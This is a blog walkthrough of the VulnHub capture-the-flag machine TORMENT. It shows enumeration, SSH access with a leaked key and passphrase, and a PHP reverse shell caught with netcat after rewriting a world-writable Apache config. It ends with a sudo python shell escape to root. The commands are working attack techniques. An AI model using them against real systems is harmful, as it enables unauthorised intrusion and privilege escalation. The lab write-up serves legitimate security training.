26 May 2022

Pentesting Fun Stuff

following the cyber security path…

Digitalworld.local: TORMENT

https://www.vulnhub.com/entry/digitalworldlocal-torment,299/

nmap scan for open ports + services

```
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.25
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
631/tcp open ipp CUPS 2.2
2049/tcp open nfs_acl 3 (RPC #100227)
6667/tcp open irc?
6668/tcp open irc?
6669/tcp open irc?
6672/tcp open vision_server?
6674/tcp open unknown
38845/tcp open nlockmgr 1-4 (RPC #100021)
42691/tcp open mountd 1-3 (RPC #100005)
50415/tcp open mountd 1-3 (RPC #100005)
59961/tcp open mountd 1-3 (RPC #100005)
```

The output of the full nmap scan is very large, so only useful pieces of it.

```
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
```

Starting with FTP first.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ wget -r ftp://192.168.58.138:21
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment/192.168.58.138]
└─$ ls -lah
total 4.8M
drwxr-xr-x 11 n0w4n n0w4n 4.0K May 1 16:08 .
drwxr-xr-x 3 n0w4n n0w4n 4.0K May 1 16:08 ..
-rw-r--r-- 1 n0w4n n0w4n 110K Dec 28 2018 alternatives.tar.0
-rw-r--r-- 1 n0w4n n0w4n 4.9K Dec 23 2018 alternatives.tar.1.gz
-rw-r--r-- 1 n0w4n n0w4n 94K Dec 28 2018 apt.extended_states.0
-rw-r--r-- 1 n0w4n n0w4n 11K Dec 27 2018 apt.extended_states.1.gz
-rw-r--r-- 1 n0w4n n0w4n 11K Dec 26 2018 apt.extended_states.2.gz
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .cups
-rw-r--r-- 1 n0w4n n0w4n 559 Dec 23 2018 dpkg.diversions.0
-rw-r--r-- 1 n0w4n n0w4n 229 Dec 23 2018 dpkg.diversions.1.gz
-rw-r--r-- 1 n0w4n n0w4n 229 Dec 23 2018 dpkg.diversions.2.gz
-rw-r--r-- 1 n0w4n n0w4n 229 Dec 23 2018 dpkg.diversions.3.gz
-rw-r--r-- 1 n0w4n n0w4n 229 Dec 23 2018 dpkg.diversions.4.gz
-rw-r--r-- 1 n0w4n n0w4n 229 Dec 23 2018 dpkg.diversions.5.gz
-rw-r--r-- 1 n0w4n n0w4n 229 Dec 23 2018 dpkg.diversions.6.gz
-rw-r--r-- 1 n0w4n n0w4n 505 Dec 28 2018 dpkg.statoverride.0
-rw-r--r-- 1 n0w4n n0w4n 295 Dec 28 2018 dpkg.statoverride.1.gz
-rw-r--r-- 1 n0w4n n0w4n 295 Dec 28 2018 dpkg.statoverride.2.gz
-rw-r--r-- 1 n0w4n n0w4n 295 Dec 28 2018 dpkg.statoverride.3.gz
-rw-r--r-- 1 n0w4n n0w4n 295 Dec 28 2018 dpkg.statoverride.4.gz
-rw-r--r-- 1 n0w4n n0w4n 281 Dec 27 2018 dpkg.statoverride.5.gz
-rw-r--r-- 1 n0w4n n0w4n 208 Dec 23 2018 dpkg.statoverride.6.gz
-rw-r--r-- 1 n0w4n n0w4n 1.7M Jan 1 2019 dpkg.status.0
-rw-r--r-- 1 n0w4n n0w4n 482K Jan 1 2019 dpkg.status.1.gz
-rw-r--r-- 1 n0w4n n0w4n 482K Jan 1 2019 dpkg.status.2.gz
-rw-r--r-- 1 n0w4n n0w4n 481K Dec 28 2018 dpkg.status.3.gz
-rw-r--r-- 1 n0w4n n0w4n 481K Dec 28 2018 dpkg.status.4.gz
-rw-r--r-- 1 n0w4n n0w4n 478K Dec 28 2018 dpkg.status.5.gz
-rw-r--r-- 1 n0w4n n0w4n 460K Dec 27 2018 dpkg.status.6.gz
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .ftp
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .imap
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .mysql
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .nfs
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .ngircd
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .samba
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .smtp
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .ssh
```

Some intersting findings here:

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment/192.168.58.138]
└─$ cat .ngircd/channels 
channels:
games
tormentedprinter
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment/192.168.58.138]
└─$ ls -lah .ssh
total 12K
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .
drwxr-xr-x 11 n0w4n n0w4n 4.0K May 1 16:08 ..
-rw------- 1 n0w4n n0w4n 1.8K Jan 4 2019 id_rsa
```

For the id_rsa I need a password, so first checking out the irc channel.

I use hexirc to connect to the irc server, but it says I need a password.
From a few google searches I get 2 different findings:
1. the default password is set empty (source: https://www.systutorials.com/docs/linux/man/5-ngircd.conf/)
2. the default password is set to `wealllikedebian` (source: https://git.in-ulm.de/cbiedl/ngircd/raw/master/debian/ngircd.conf)

This password seems to work and I enter the channel `games`

```
* Now talking on #games
* Topic for #games is: Welcome to the Games Channel!
* Topic for #games set by -Server- (Sat May 1 15:21:29 2021)
```

0 users and no information.

Joining channel `tormentedprinter`

```
* Now talking on #tormentedprinter
* Topic for #tormentedprinter is: If you find that the printers are not printing as they should, you can configure them and check for jammed jobs by logging in with the password "mostmachineshaveasupersecurekeyandalongpassphrase".
* Topic for #tormentedprinter set by -Server- (Sat May 1 15:21:29 2021)
```

A password. But I still lack a username.
Continuing the enumeration.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ gobuster dir -u http://192.168.58.138 -x php,html -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.58.138
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,php
[+] Add Slash: true
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2021/05/01 16:14:11 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/icons/ (Status: 403) [Size: 286] 
/manual/ (Status: 200) [Size: 626] 
/server-status/ (Status: 403) [Size: 294] 

===============================================================
2021/05/01 16:17:25 Finished
===============================================================
```

The webserver didn’t gave much info.
Another public facing service nmap did find was CUPS (Common UNIX Printing System).

```
631/tcp open ipp syn-ack ttl 64 CUPS 2.2
| http-methods: 
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Home - CUPS 2.2.1
```

When directing my browser to this service and looking at the `Printers` tab, I get a list of usernames.

```
Queue Name Description Location Make and Model Status
Albert's_Personal_Printer Enterprise Team 1 Good Tech Inc, Basement 1 Apple LaserWriter Select 360 Foomatic/Postscript (recommended) Idle
Cherrlt's_Personal_Printer Receptionist's Desk Good Tech Inc, Level 1 Xerox 4045 XES Foomatic/xes (recommended) Idle
David's_Personal_Printer The Director's Personal Printer Good Tech Inc, Level 7 Apple LaserWriter Select 360 Foomatic/Postscript (recommended) Idle
Edmund's_Personal_Printer For all of Network Infrastructure Good Tech Inc, Level 4 Xerox 4045 XES Foomatic/xes (recommended) Idle
Ethan's_Personal_Printer Enterprise Team 2 Good Tech Inc, Basement 1 Apple LaserWriter Select 360 Foomatic/Postscript (recommended) Idle
Eva's_Personal_Printer Personal Printer for Eva Good Tech Inc, Basement 2 Xerox 4045 XES Foomatic/xes (recommended) Idle
Genevieve's_Personal_Printer For all of Legal Good Tech Inc, Level 6 Xerox 4045 XES Foomatic/xes (recommended) Idle
Govindasamy's_Personal_Printer NOT FOR THE INFRA TEAM!! Good Tech Inc, Level 4 Apple LaserWriter Select 360 Foomatic/Postscript (recommended) Idle
Jessica's_Personal_Printer Receptionist's Desk Good Tech Inc, Level 1 Xerox 4045 XES Foomatic/xes (recommended) Idle
Kenny's_Personal_Printer NOT FOR THE ENTERPRISE TEAM!!! Good Tech Inc, Basement 1 Apple LaserWriter Select 360 Foomatic/Postscript (recommended) Idle
Patrick's_Personal_Printer Personal Printer for Patrick and Development Department Good Tech Inc, Basement 2 Xerox 4045 XES Foomatic/xes (recommended) Idle
Qinyi's_Personal_Printer Personal Printer for Qinyi Good Tech Inc, Level 3 Xerox WorkCentre PE120 Foomatic/pxlmono Idle
Qiu's_Personal_Printer Personal Printer for Qiu and Procurement Department Good Tech Inc, Level 5 Xerox WorkCentre 7345 Foomatic/pxlcolor (recommended) Idle
Roland's_Personal_Printer For Roland's Own Use Good Tech Inc, Level 4 Apple LaserWriter Select 360 Foomatic/Postscript (recommended) Idle
Sara's_Personal_Printer Personal Printer for Sara Good Tech Inc, Level 5 Xerox WorkCentre 7345 Foomatic/pxlcolor (recommended) Idle
```

Creating a list

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ curl -s http://192.168.58.138:631/printers/ | grep Personal | cut -d/ -f3 | cut -d'&' -f1 > usernames
```

For the enumeration of the smtp server, I use a python script (https://github.com/tommelo/smtpenum)

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ ./smtpenum.py -t 192.168.58.138 -l usernames

_____ __ __ _______ _____ ______ _ _ _ _ __ __
/ ____| \/ |__ __| __ \ | ____| \ | | | | | \/ |
| (___ | \ / | | | | |__) | | |__ | \| | | | | \ / |
\___ \| |\/| | | | | ___/ | __| | . ` | | | | |\/| |
____) | | | | | | | | | |____| |\ | |__| | | | |
|_____/|_| |_| |_| |_| |______|_| \_|\____/|_| |_|

[mr.church] - v1.0.0

[+] Trying to resolve host by name
[+] 192.168.58.138 has address: 192.168.58.138
[+] SMTP port is openned!
[+] Grabbing SMTP Banner...
[+] 220 TORMENT.localdomain ESMTP Postfix (Debian/GNU)

[+] Trying to enumerate users...
[+] Accepted: Patrick
[+] Accepted: Qiu
```

Then combining these names with the found password and see if I can log in with ssh.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment/192.168.58.138/.ssh]
└─$ ssh -i id_rsa patrick@192.168.58.138
Enter passphrase for key 'id_rsa': 
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jan 4 19:34:43 2019 from 192.168.254.139
patrick@TORMENT:~$ 
```
```
patrick@TORMENT:~$ sudo -l
Matching Defaults entries for patrick on TORMENT:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User patrick may run the following commands on TORMENT:
(ALL) NOPASSWD: /bin/systemctl poweroff, /bin/systemctl halt, /bin/systemctl reboot
```
```
patrick@TORMENT:~$ cat /etc/passwd | grep -e '100.*'
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
qiu:x:1000:1000:qiu,,,:/home/qiu:/bin/bash
patrick:x:1001:1001:,,,:/home/patrick:/bin/bash
```
```
patrick@TORMENT:~$ find / -iname "*.conf" -type f -perm -o+w -exec ls -ld {} \; 2>/dev/null
-rwxrwxrwx 1 root root 7224 Nov 4 2018 /etc/apache2/apache2.conf
```

That’s off. Normally this file is only writable for root. The rest is read-only.
This can be used to our adventage, but there is another piece of the puzzle I need to check.

```
patrick@TORMENT:~$ ls -ld /var/www/html
drwxrwxrwx 2 www-data www-data 4096 Jan 1 2019 /var/www/html
```

Right. So this is also not very good to have, because anyone can drop a php file with a malicious payload in the root folder of the webserver. Now to combine these two findings.
First changing the apache config file and adding a new default user. User qiu in this case, because I already have access to user patrick.

```
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
User qiu
Group qiu
```

Now to transfer a php reverse shell to the remote machine using the know ssh credentials.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ scp -i 192.168.58.138/.ssh/id_rsa shell.php patrick@192.168.58.138:/var/www/html/
Enter passphrase for key '192.168.58.138/.ssh/id_rsa': 
shell.php
```

Setting up a listener and rebooting the remote machine.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ sudo nc -lvp 9998
listening on [any] 9998 ...
```
```
patrick@TORMENT:~$ sudo systemctl reboot
```

After rebooting access the shell.php file with the webbrowser.
And we have a reverse shell to user qiu.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ sudo nc -lvp 9998
listening on [any] 9998 ...
192.168.58.138: inverse host lookup failed: Unknown host
connect to [192.168.58.128] from (UNKNOWN) [192.168.58.138] 49682
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
01:55:40 up 1 min, 0 users, load average: 0.12, 0.04, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(qiu) gid=1000(qiu) groups=1000(qiu),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner)
/bin/sh: 0: can't access tty; job control turned off
$
```
```
$ python -c 'import pty;pty.spawn("/bin/bash");'
qiu@TORMENT:/$
```
```
qiu@TORMENT:/$ sudo -l
sudo -l
Matching Defaults entries for qiu on TORMENT:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User qiu may run the following commands on TORMENT:
(ALL) NOPASSWD: /usr/bin/python, /bin/systemctl
```

If the python binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

```
qiu@TORMENT:/$ sudo python -c 'import os; os.system("/bin/sh")'
sudo python -c 'import os; os.system("/bin/sh")'
# id
id
uid=0(root) gid=0(root) groups=0(root)
```

And for the final part.

```
# cat /root/proof.txt
cat /root/proof.txt
Congrutulations on rooting TORMENT. I hope this box has been as fun for you as it has been for me. :-)

Until then, try harder!
```

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.